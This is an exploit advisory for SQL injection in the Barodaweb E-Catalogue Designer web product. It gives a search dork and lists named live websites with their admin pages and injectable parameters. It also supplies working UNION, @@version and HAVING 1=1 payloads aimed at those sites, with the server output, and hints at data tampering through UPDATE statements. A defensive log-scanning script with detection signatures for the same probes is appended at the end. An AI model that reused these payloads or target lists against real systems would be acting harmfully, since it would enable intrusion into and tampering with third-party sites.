Barodaweb The E-Catalogue Designer SQL Injection

2015.12.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[*] Exploit Title : Barodaweb The E-Catalogue Designer SQL Injection
[*] Exploit Author : Ashiyane Digital Security Team
[*] Dork : intext:"Powered By: Barodaweb The E-Catalogue Designer" inurl:id
[*] Vendor Homepage : www.barodaweb.com
[*] Date : 2015.12.19
[*] Tested On : Win 7 / FireFox
[*] DB : SQL SERVER (MSSQL)

[*] Admin Page Demo :
http://shobhatanks.com/admin/
http://www.chemtraders.in/admin/
http://www.almac-machinery.com/admin/
http://www.timescanindia.in/admin/
http://aquaservices.co.in/admin/

[*] Vulnerabilities Demo :
http://www.gripholdindia.com/Services.aspx?Id=[sql]
http://aquaservices.co.in/Product.aspx?Id=[sql]
http://www.tithicreations.com/Product.aspx?ID=3&SID=[sql]
http://www.timescanindia.in/Downloads.aspx?Id=[sql]
http://shobhatanks.com/ProductDetails.aspx?Id=[sql]
http://www.almac-machinery.com/Catgeory.aspx?Id=[sql]
http://labourlawadvisor.com/News.aspx?Id=[sql]
http://www.chemtraders.in/Product.aspx?Id=[sql]
http://www.utechfasten.in/ProductTools.aspx?Id=[sql]
,....

[*] Exploit Examples :
http://www.gripholdindia.com/Services.aspx?Id=1' and 1=0 UNION all SELECT 1,@@version,3,4-- -
Version :
Microsoft SQL Server 2005 - 9.00.4060.00 (Intel X86) Mar 17 2011 13:20:38 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 6.1 (Build 7601: Service Pack 1)

[*] Exploit Examples :
http://www.bpcindia.org/Download.aspx?id=9 and 1=0 union all select 1,2,3,@@version,5,6,7 -- -
Version :
Microsoft SQL Server 2008 R2 (SP1) - 10.50.2550.0 (X64) Jun 11 2012 16:41:53 Copyright (c) Microsoft Corporation Express Edition with Advanced Services (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)

[*] Exploit Examples without using admin page :
http://www.alXmac-machinery.com/Catgeory.aspx?Id=1' having 1=1-- -
http://labourlXawadvisor.com/News.aspx?Id=7' having 1=1 -- -
http://www.Xchemtraders.in/Product.aspx?Id=14 having 1=1 -- -
http://aquaXservices.co.in/Product.aspx?Id=4 having 1=1-- -
(Use Update Statement)

[*] Discovered by : V For Vendetta
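A log-side check for the injection patterns quoted in the exploit examples above, added here as an illustration and not part of the advisory or the vendor's product. It parses constructed IIS-style request lines (the field order date, time, client IP, method, URI stem, query, status is an assumption) and flags .aspx requests whose Id/SID parameter carries the UNION / @@version / HAVING 1=1 probes and the "-- -" comment terminator shown on this page.

```python
import re
from urllib.parse import parse_qs

# Signatures derived from the injection strings shown in the advisory.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("version-probe", re.compile(r"@@version", re.I)),
    ("having-probe", re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I)),
    ("comment-terminator", re.compile(r"--\s*-?\s*$")),   # trailing "-- -" / "--"
    ("quote-break", re.compile(r"^\d+'")),                # numeric id followed by a quote
]

# Query parameters the advisory names as injectable in the affected .aspx pages.
WATCHED_PARAMS = {"id", "sid"}


def parse_iis_line(line):
    """Split one simplified W3C-style line: date time c-ip method stem query status."""
    parts = line.split()
    if len(parts) < 7:
        return None
    return {"ip": parts[2], "method": parts[3], "stem": parts[4],
            "query": parts[5], "status": parts[6]}


def inspect_query(query):
    """Return (param, signature) hits found in watched parameters of a URL query."""
    hits = []
    if query == "-":            # IIS writes "-" when there is no query string
        return hits
    # parse_qs percent-decodes values and splits each pair at the first "=",
    # so "Id=1' and 1=0 ..." keeps its inner "1=0" intact.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.lower() not in WATCHED_PARAMS:
            continue
        for value in values:
            for label, pattern in SIGNATURES:
                if pattern.search(value):
                    hits.append((name, label))
    return hits


def scan_log(lines):
    """Return alerts (ip, stem, param, signature) for .aspx requests carrying a signature."""
    alerts = []
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None or not rec["stem"].lower().endswith(".aspx"):
            continue
        for param, label in inspect_query(rec["query"]):
            alerts.append((rec["ip"], rec["stem"], param, label))
    return alerts


# Constructed sample log lines (RFC 5737 test addresses, not real traffic).
SAMPLE_LOG = [
    "2015-12-19 10:01:02 203.0.113.5 GET /Product.aspx Id=4 200",
    "2015-12-19 10:01:09 203.0.113.5 GET /Services.aspx Id=1'%20and%201=0%20UNION%20all%20SELECT%201,@@version,3,4--%20- 200",
    "2015-12-19 10:02:15 198.51.100.7 GET /Product.aspx Id=14%20having%201=1%20--%20- 500",
    "2015-12-19 10:03:00 192.0.2.9 GET /Downloads.aspx Id=3&SID=2 200",
    "2015-12-19 10:03:30 192.0.2.9 GET /search.html q=union%20select 200",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The benign request on line one and the non-.aspx request on the last line produce no alert; the two probe lines produce one alert per matching signature, which is enough to rate-limit or block the source while the parameter is fixed with a parameterized query.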

